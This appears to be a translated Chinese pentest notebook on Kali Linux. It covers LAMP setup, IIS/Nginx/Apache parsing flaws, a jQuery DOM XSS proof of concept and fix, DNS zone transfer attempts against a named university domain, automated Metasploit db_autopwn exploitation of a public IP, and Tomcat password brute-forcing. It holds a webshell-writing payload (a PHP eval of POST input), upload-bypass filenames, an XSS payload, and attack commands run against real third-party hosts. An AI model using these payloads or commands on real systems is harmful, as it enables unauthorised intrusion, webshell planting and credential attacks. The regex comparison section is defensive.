Using LAMP (PHP + MySQL) on Kali

Kali ships with apache, mysql and php preinstalled; the PHP version is 5.4.45

service apache2 start    # start apache; the default document root is /var/www/
service mysql start      # start mysql; the default data directory is /var/lib/mysql/mysql/, the error log is /var/log/mysql.err

The default mysql root account has an empty password; change it with the following command:
/usr/bin/mysqladmin -u root password root

Command explanation
/usr/bin/mysqladmin -u root password 'new-password'
Format: mysqladmin -u<username> -p<old password> password <new password>. Because the password above is empty, -p<old password> can be omitted.

To test whether mysql works, use the following command:
mysql -u root -p    # you are then prompted for the password: Enter password:
A wrong password gives: ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
If the password is correct you enter the mysql shell; its built-in help lists the following commands:

For information about MySQL products and services, visit:
http://www.mysql.com/
For developer information, including the MySQL Reference Manual, visit:
http://dev.mysql.com/
To buy MySQL Enterprise support, training, or other products, visit:
https://shop.mysql.com/

List of all MySQL commands:
Note that all text commands must be first on line and end with ';'
?         (\?) Synonym for `help'.
clear     (\c) Clear the current input statement.
connect   (\r) Reconnect to the server. Optional arguments are db and host.
delimiter (\d) Set statement delimiter.
edit      (\e) Edit command with $EDITOR.
ego       (\G) Send command to mysql server, display result vertically.
exit      (\q) Exit mysql. Same as quit.
go        (\g) Send command to mysql server.
help      (\h) Display this help.
nopager   (\n) Disable pager, print to stdout.
notee     (\t) Don't write into outfile.
pager     (\P) Set PAGER [to_pager]. Print the query results via PAGER.
print     (\p) Print current command.
prompt    (\R) Change your mysql prompt.
quit      (\q) Quit mysql.
rehash    (\#) Rebuild completion hash.
source    (\.) Execute an SQL script file. Takes a file name as an argument.
status    (\s) Get status information from the server.
system    (\!) Execute a system shell command.
tee       (\T) Set outfile [to_outfile]. Append everything into given outfile.
use       (\u) Use another database. Takes database name as argument.
charset   (\C) Switch to another charset. Might be needed for processing binlog with multi-byte charsets.
warnings  (\W) Show warnings after every statement.
nowarning (\w) Don't show warnings after every statement.

For server side help, type 'help contents'

Summary of web server parsing vulnerabilities

IIS parsing vulnerabilities

1. Directory parsing: /info.php/info.gif    # every file under a directory named /info.php/ is parsed as an executable PHP script
2. File parsing: info.php;.gif    # before IIS 6.0, nothing after the ';' is parsed, so the file is parsed as info.php (.asa, .cer and .cdx are also executable script extensions on IIS 6.0)
IIS 7.0 / IIS 7.5 / Nginx < 8.03 malformed parsing vulnerability
With the default Fast-CGI setting enabled, upload a file named wooyun.jpg whose content is
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
then request wooyun.jpg/.php, and a one-line webshell shell.php is written into that directory
Nginx < 8.03 null-byte code execution vulnerability
With Nginx, embed PHP code in an image and then request xxx.jpg%00.php

Apache parsing vulnerability
Apache evaluates extensions from right to left; if an extension is not recognized, it moves one step further left and checks again.
For example, with wooyun.php.owf.rar, ".owf" and ".rar" are two suffixes Apache cannot parse, so Apache parses wooyun.php.owf.rar as PHP.
Working out which suffixes are recognized is the key to exploiting this; when testing, try uploading something like wooyun.php.rara.jpg.png... (append every common suffix you know) to see which suffixes are recognized.

PHP CGI parsing vulnerability && Nginx parsing vulnerability
1.jpg/*.php is parsed and executed as a PHP file

jQuery DOM XSS PoC and fix

Downloaded the jQuery JavaScript Library v1.6.1.
The following page includes the jQuery library and is used to verify the DOM XSS

<html>
<head>
<title>jQuery DomXSS test</title>
<script type="text/javascript" src="jquery.min.js"></script>
<script>
// the page is addressed as html#par; the par that is passed in is rendered into the page
$(location.hash)
</script>
</head>
<body>
Hello,jQuery.
<p>Test URL:   1.html#foo<img src=1 onerror=alert(111111111111111111)></p>
</body>
</html>

Adding #foo<img src=1 onerror=alert(111111111111111111)></p> directly to the URL, or putting the URL into the page, both trigger it: the onerror event fires when the image fails to load.
Fix:
Change /^(?:[^<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/ to /^(?:[^#<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/. Compare the two regexes carefully: the only difference is that ^< became ^#<, i.e. the leading character class [^<] became [^#<]. Originally it only ruled out <; after the change it also rules out #, so a string that starts with # can no longer be matched by the HTML branch.
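To see what that one-character change does, here is an added example (not from the original post or from jQuery) that runs the PoC hash through both versions of the regex and reports which branch of jQuery's $() string handling each version would take; the classify and compare helpers are hypothetical names introduced here.

```javascript
// Added example (not from the original post or from jQuery): the two
// versions of jQuery's quick-expression regex from the fix above, and a small
// classifier that mimics the decision jQuery 1.6.x makes when $() is given a
// string: HTML (build elements from it), an ID (look it up), or a selector
// (hand it to the selector engine). Only the first outcome creates markup
// from the string, so that is the outcome location.hash must never reach.

// Before the fix: a leading "#" does not stop the HTML branch.
const rquickExprBefore = /^(?:[^<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/;
// After the fix: the HTML branch refuses any string that starts with "#".
const rquickExprAfter = /^(?:[^#<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/;

// Classify a $() argument the way the quick-expression check does.
// Returns { kind: "html" | "id" | "selector", value }.
function classify(rquickExpr, input) {
  const match = rquickExpr.exec(input);
  if (match && match[1]) {
    // jQuery would build DOM nodes from match[1]; an <img onerror> fires here.
    return { kind: "html", value: match[1] };
  }
  if (match && match[2] !== undefined) {
    // jQuery would call getElementById(match[2]); no markup is created.
    return { kind: "id", value: match[2] };
  }
  // Anything else goes to the selector engine, which never creates markup.
  return { kind: "selector", value: input };
}

// The PoC value from the page, exactly as it arrives in location.hash.
const POC_HASH = "#foo<img src=1 onerror=alert(111111111111111111)>";

// Run a set of hash values through both regexes; returns, per input, the
// kind each version assigns, so the before/after difference is visible.
function compare(inputs = [POC_HASH, "#foo", "<p>hi</p>", "div.item"]) {
  return inputs.map((input) => ({
    input,
    before: classify(rquickExprBefore, input).kind,
    after: classify(rquickExprAfter, input).kind,
  }));
}

console.table(compare());
```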
 

Three common commands for DNS zone transfer vulnerabilities on Kali

1. Using dnswalk: dnswalk cqjtu.edu.cn. (note the trailing dot)

root@0535coder:~# dnswalk cqjtu.edu.cn.
defined(@array) is deprecated at /usr/bin/dnswalk line 61.
(Maybe you should just omit the defined()?)
Checking cqjtu.edu.cn.
BAD: cqjtu.edu.cn. has only one authoritative nameserver
Getting zone transfer of cqjtu.edu.cn. from dns1.cqjtu.edu.cn…done.
SOA=dns1.cqjtu.edu.cn    contact=root.cqjtu.edu.cn
0 failures, 41 warnings, 1 errors.

2. Using dig (first get the NS records with dig +noall +answer cqjtu.edu.cn ns, then pick an NS record and attempt the zone transfer: dig +noall +answer @dns1.cqjtu.edu.cn. cqjtu.edu.cn axfr)

root@0535coder:~# dig +noall +answer cqjtu.edu.cn ns
cqjtu.edu.cn.           43257   IN      NS      dns1.cqjtu.edu.cn.
root@0535coder:~# dig +noall +answer @dns1.cqjtu.edu.cn. cqjtu.edu.cn axfr
cqjtu.edu.cn.           86400   IN      SOA     dns1.cqjtu.edu.cn. root.cqjtu.edu.cn. 201310501 43200 7200 604800 86400
cqjtu.edu.cn.           86400   IN      MX      10 mail.cqjtu.edu.cn.
cqjtu.edu.cn.           86400   IN      NS      dns1.cqjtu.edu.cn.
cqjtu.edu.cn.           86400   IN      SOA     dns1.cqjtu.edu.cn. root.cqjtu.edu.cn. 201310501 43200 7200 604800 86400

3. Using dnsenum for enumeration and Google scraping (dnsenum -enum cqjtu.edu.cn.)

root@0535coder:~# dnsenum -enum cqjtu.edu.cn.
dnsenum.pl VERSION:1.2.3
Warning: can't load Net::Whois::IP module, whois queries disabled.

-----   cqjtu.edu.cn.   -----

Host's addresses:
__________________

Name Servers:
______________

dns1.cqjtu.edu.cn.                       71212    IN    A        202.202.240.33

Mail (MX) Servers:
___________________

mail.cqjtu.edu.cn.                       84208    IN    A        202.202.240.35

Trying Zone Transfers and getting Bind Versions:
_________________________________________________

Trying Zone Transfer for cqjtu.edu.cn. on dns1.cqjtu.edu.cn ...
cqjtu.edu.cn.                            86400    IN    SOA      dns1.cqjtu.edu.cn.
cqjtu.edu.cn.                            86400    IN    MX               10
cqjtu.edu.cn.                            86400    IN    NS       dns1.cqjtu.edu.cn.

Scraping cqjtu.edu.cn. subdomains from Google:
_______________________________________________

Error GETing http://www.google.com/ncr: Can't connect to www.google.com:80 (timeout) at /usr/bin/dnsenum line 909

4. Using the DOS command nslookup to test for a zone transfer vulnerability
nslookup
set type=ns           # set the query type to NS
test.cn               # query the domain; this shows the DNS server addresses
server 10.95.18.13    # send further queries to that DNS server
set type=all          # query all record types
ls -d test.cn         # check whether zone transfer is allowed

 

Automated getshell with Metasploit and nmap on Kali

service postgresql start
msfconsole
db_status
db_nmap -sV -O -T4 116.255.141.167
load db_autopwn
Running the command above reports that the db_autopwn file does not exist: /opt/metasploit/apps/pro/msf3/plugins/db_autopwn
Download the file from http://download.csdn.net/detail/terrying/5063334, put it in the directory above, and run the command again.
db_autopwn -p -e -t -r

# list shells
sessions -l
# list vulnerabilities
vulns
# delete a host
hosts -d <host IP>

Brute-forcing Tomcat with Metasploit

The Tomcat home page shows hello world, so I tried the /manager/html directory, which is also reachable; it is a Tomcat service, but without the password there is no way to get a shell. I looked up CVEs, but this version is fairly new and has none of the old vulnerabilities.

Start Metasploit
service postgresql start
msfconsole

# help shows the usage
set RHOSTS 110.110.110.110
set RPORT 8180
run

# By default only 55 routine attempts are made; they only succeed easily when tomcat still has its default password or is an old version, otherwise a custom user and password wordlist is needed
set pass_file /root/Desktop/wordlists/metasploit-jtr/password.lst    # this wordlist gives 530383 attempts
# By default the password wordlist bundled with Kali is used; the user can be set to a single name, or to one field: set username tomcat